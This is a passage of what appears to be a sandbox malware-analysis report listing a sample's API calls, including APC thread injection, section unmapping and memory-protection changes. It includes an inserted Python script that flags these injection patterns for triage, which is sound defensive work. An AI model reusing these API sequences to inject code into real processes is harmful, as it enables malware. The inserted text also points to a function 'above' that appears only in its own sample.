    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
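The per-function API lists in this report are where the interesting behaviour is visible: the CreateThread function above (ref 001CB485) has a callee 001CB35F that walks CreateToolhelp32Snapshot, Thread32First, OpenThread and QueueUserAPC, and the ResumeThread/SuspendThread function directly above has a callee 001DBD3F that copies a 0x800-byte buffer and calls NtUnmapViewOfSection. Both are worth flagging automatically when reading many such reports. The following is an added example, not part of the Joe Sandbox report or its engine: it parses the "APIs" sections in the report's own line format and applies two set-based heuristics. The rule names and the two API sets are this example's assumptions, and the sample text is a trimmed copy of entries from the report.

```python
import re

# Constructed sample: "APIs" entries of three function blocks copied from the
# Joe Sandbox similarity report and trimmed. The report's own line format is
# "Name.MODULE(args), ref: ADDR"; "Part of subcall function X:" marks a call
# made by callee X rather than by the function itself.
SAMPLE_REPORT = """\
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000), ref: 001CB44F
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
APIs
  • memset.NTDLL ref: 001DC240
  • ResumeThread.KERNEL32(?,?,00000004), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
Memory Dump Source
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
"""

# One report line: optional callee prefix, API name, module, optional argument
# list, and the call-site address after "ref:".
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<callee>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-F]+)"
)

# Heuristics are this example's own assumptions, not Joe Sandbox signatures.
# Every API in a rule must appear somewhere in one function block, own calls
# and subcall entries alike. The report lists calls in listing order, not
# execution order, so no ordering is required.
INJECTION_RULES = {
    "thread_enum_apc_queue": {
        "CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC",
    },
    "unmap_section_with_thread_control": {
        "NtUnmapViewOfSection", "SuspendThread", "ResumeThread",
    },
}


def parse_api_blocks(report_text):
    """Split the report into function blocks and parse each 'APIs' list.

    Returns a list of blocks. Each block is a list of dicts with keys api,
    module, args (list of strings), ref, and callee (None for the function's
    own calls, the callee address for 'Part of subcall function' entries).
    """
    blocks, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line in ("Memory Dump Source", "Strings"):
            current = None  # end of this block's API list
            continue
        if current is None:
            continue
        match = API_LINE.search(line)
        if match:
            entry = match.groupdict()
            entry["args"] = entry["args"].split(",") if entry["args"] else []
            current.append(entry)
    return blocks


def flag_blocks(blocks, rules=INJECTION_RULES):
    """Return one finding per (block, rule) whose API set is fully present.

    Each finding carries the block index, the rule name, and the call-site
    addresses of the matching APIs so an analyst can jump to them.
    """
    findings = []
    for index, block in enumerate(blocks):
        present = {entry["api"] for entry in block}
        for rule, required in rules.items():
            if required <= present:
                refs = [entry["ref"] for entry in block if entry["api"] in required]
                findings.append({"block": index, "rule": rule, "refs": refs})
    return findings


if __name__ == "__main__":
    for finding in flag_blocks(parse_api_blocks(SAMPLE_REPORT)):
        print(finding["rule"], "block", finding["block"], "refs", ", ".join(finding["refs"]))
```

Run against the full report text rather than the embedded sample to triage every function block; the subset check deliberately ignores call order, because the report prints a callee's calls after the caller's even when they execute first.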
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
